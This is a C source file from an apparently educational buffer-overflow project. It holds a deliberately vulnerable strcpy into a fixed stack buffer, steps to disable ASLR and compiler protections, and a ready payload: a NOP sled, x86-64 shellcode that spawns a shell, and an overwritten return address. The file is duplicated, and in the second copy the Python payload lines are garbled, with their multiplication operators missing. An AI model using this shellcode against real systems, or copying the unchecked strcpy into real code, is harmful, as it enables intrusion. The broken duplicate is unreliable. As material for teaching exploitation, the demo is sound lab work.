jackbergus/vuln.c

## vuln.c
/*
 * vuln2.c
 * This file is part of bufovattack
 *
 * Copyright (C) 2021 - Giacomo Bergami
 *
 * bufovattack is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * bufovattack is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with bufovattack. If not, see <http://www.gnu.org/licenses/>.
 */

// In order to disable ASLR, we need to first run the following command
// $ sudo su
// # echo 0 > /proc/sys/kernel/randomize_va_space
//
// ASLR is a measure preventing exploitation of memory corruption vulnerabilities
// ASLR randomly arranges the address space positions of key data areas of a process, including the base of the executable and the positions of the stack, heap and libraries.
// By doing so, it makes harder for the attacker to exploit a buffer overflow attack

/** Compile with gcc -fno-stack-protector -z execstack -no-pie vuln2.c -o vuln2 -g
 *
 * no-stack-protector = disable the checks of overwriting Activation Record associated to a function
                        This will disable the "stack smashing detected" error while running the code! And instead, has a Segmentation Fault!
 * execstack          = make the stack executable
 * -no-pie            = PIE is a precodition to enable address space layout randomization
 * -g                 = enables debug mode
 *
 */

//

// Use PEDA for better experience in GDB while dealing with address spaces corruption: https://github.com/longld/peda

// In GDB, run it as follows: /home/giacomo/buff_dump/vuln2 $(python2 -c 'print "\x90"*450+"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"+"\x41"*43+"b"*6')

// The activation record containing the value rsp is then copied to the rsb

// Then, this will get the part where the address was written: x/200x $rsp
// Look for the address where we have some noops, like 0x9090909090909090. Then, use the part that follows...

// Run with ./vuln2 $(python2 -c 'print "\x90"*450+"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"+"\x41"*43+"\xf0\xe1\xff\xff\xff\x7f"'),
// where the last part of the code is the address written from right to left, one byte at a time
#include <stdio.h>
#include <string.h>

int main(int argc, char* argv[])  {
	char buf[512];
	strcpy(buf, argv[1]);
	return 0;
}
	/*
	* vuln2.c
	* This file is part of bufovattack
	*
	* Copyright (C) 2021 - Giacomo Bergami
	*
	* bufovattack is free software; you can redistribute it and/or modify
	* it under the terms of the GNU General Public License as published by
	* the Free Software Foundation; either version 2 of the License, or
	* (at your option) any later version.
	*
	* bufovattack is distributed in the hope that it will be useful,
	* but WITHOUT ANY WARRANTY; without even the implied warranty of
	* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
	* GNU General Public License for more details.
	*
	* You should have received a copy of the GNU General Public License
	* along with bufovattack. If not, see <http://www.gnu.org/licenses/>.
	*/

	// In order to disable ASLR, we need to first run the following command
	// $ sudo su
	// # echo 0 > /proc/sys/kernel/randomize_va_space
	//
	// ASLR is a measure preventing exploitation of memory corruption vulnerabilities
	// ASLR randomly arranges the address space positions of key data areas of a process, including the base of the executable and the positions of the stack, heap and libraries.
	// By doing so, it makes harder for the attacker to exploit a buffer overflow attack

	/** Compile with gcc -fno-stack-protector -z execstack -no-pie vuln2.c -o vuln2 -g
	*
	* no-stack-protector = disable the checks of overwriting Activation Record associated to a function
	This will disable the "stack smashing detected" error while running the code! And instead, has a Segmentation Fault!
	* execstack = make the stack executable
	* -no-pie = PIE is a precodition to enable address space layout randomization
	* -g = enables debug mode
	*
	*/

	//

	// Use PEDA for better experience in GDB while dealing with address spaces corruption: https://github.com/longld/peda

	// In GDB, run it as follows: /home/giacomo/buff_dump/vuln2 $(python2 -c 'print "\x90"450+"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"+"\x41"43+"b"*6')

	// The activation record containing the value rsp is then copied to the rsb

	// Then, this will get the part where the address was written: x/200x $rsp
	// Look for the address where we have some noops, like 0x9090909090909090. Then, use the part that follows...

	// Run with ./vuln2 $(python2 -c 'print "\x90"450+"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"+"\x41"43+"\xf0\xe1\xff\xff\xff\x7f"'),
	// where the last part of the code is the address written from right to left, one byte at a time
	#include <stdio.h>
	#include <string.h>

	int main(int argc, char* argv[]) {
	char buf[512];
	strcpy(buf, argv[1]);
	return 0;
	}